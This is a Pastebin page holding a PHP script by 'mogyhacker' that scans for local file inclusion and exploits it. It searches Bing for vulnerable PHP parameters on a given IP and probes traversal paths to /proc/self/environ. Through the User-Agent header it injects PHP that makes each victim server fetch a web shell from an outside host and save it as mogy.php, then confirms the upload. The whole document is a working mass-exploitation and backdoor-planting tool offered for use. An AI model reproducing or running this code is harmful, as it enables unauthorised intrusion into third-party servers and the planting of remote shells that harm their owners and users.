Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- Author = mogyhacker
- Updated By INJ3CTOR_M4 ( Added Server Scanner , function lfi scanner )
- */
- @set_time_limit (0);
- error_reporting (0);
- $ip = $argv[1];
- echo"\n\t\tScanning LFI From $ip\n\n";
- $dorks = array('.php?action=', '.php?download=', '.php?file=', '.php?f=', '.php?page=', '.php?pg=', '.php?pagina=', '.php?lang=', '.php?language=');
- foreach($dorks as $dork){
- foreach(Rev ("ip:$ip $dork") as $url){
- $gt = lficurl ($url.'__dz__',"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3");
- $searchme = "failed to open stream";
- if(preg_match("/$searchme/i", $gt)){
- echo "\n[+] $url >> Vulnerable !\r\n";
- $environs = array ('/proc/self/environ','../proc/self/environ','../../proc/self/environ','../../../proc/self/environ','../../../../proc/self/environ','../../../../../proc/self/environ','../../../../../../proc/self/environ','../../../../../../../proc/self/environ','../../../../../../../../proc/self/environ','../../../../../../../../../proc/self/environ','../../../../../../../../../../proc/self/environ','../../../../../../../../../../../proc/self/environ','../../../../../../../../../../../../proc/self/environ','../../../../../../../../../../../../../proc/self/environ','../../../../../../../../../../../../../../proc/self/environ','/proc/self/environ%00','../proc/self/environ%00','../../proc/self/environ%00','../../../proc/self/environ%00','../../../../proc/self/environ%00','../../../../../proc/self/environ%00','../../../../../../proc/self/environ%00','../../../../../../../proc/self/environ%00','../../../../../../../../proc/self/environ%00','../../../../../../../../../proc/self/environ%00','../../../../../../../../../../proc/self/environ%00','../../../../../../../../../../../proc/self/environ%00','../../../../../../../../../../../../proc/self/environ%00','../../../../../../../../../../../../../proc/self/environ%00','../../../../../../../../../../../../../../proc/self/environ%00');
- foreach ($environs as $environ){
- $envs = lficurl ($url.$environ,"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3");
- if (preg_match("/HTTP_HOST/",$envs)){
- echo"\t[+] Environ Found!\r\n";
- lficurl ($url.$environ, "<?php file_put_contents('mogy.php',file_get_contents('http://ifiwon50million.com/wp-admin/upload.txt')); ?>");
- $pathinfo = pathinfo($url);
- $shellpath = $pathinfo['dirname'].'/mogy.php';
- if (preg_match ("/By Mogy/",file_get_contents($shellpath))){
- echo"\tShell Uploaded: $shellpath\n\n";
- }else{
- echo"Environ Methode Don't Allowed\n\n";
- }
- }else{
- echo"\t[+] Environ Not Found!\n\n";
- }
- }
- }else{
- echo"\n[+] $url >> Not Vulnerable!\r\n";
- }
- }
- }
- function Rev ($dork)
- {
- for($i = 1; $i <= 1000; $i += 10){
- $gt = lficurl ("http://www.bing.com/search?q=".urlencode($dork)."&first=$i","msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
- $searchme = '/<h2><a href="(.*?)" h="/';
- preg_match_all($searchme, $gt, $matches);
- foreach($matches[1] as $site){
- $urls[] = _Fix($site);
- }
- if(!preg_match('#class="sb_pagN"#',$gt)) break;
- }
- if(!empty($urls) && is_array($urls)){
- return array_unique($urls);
- }
- }
- function _Fix($site){ preg_match_all("#(.*?)?(.*?)=(.*?)#",$site,$res); return $res[2][0]."="; }
- function lficurl ($url,$useragent)
- {
- $ch = curl_init();
- curl_setopt ($ch, CURLOPT_URL, $url);
- curl_setopt ($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
- curl_setopt ($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
- curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- $result = curl_exec ($ch);
- curl_close ($ch);
- return $result;
- }
Advertisement
Add Comment
Please, Sign In to add comment
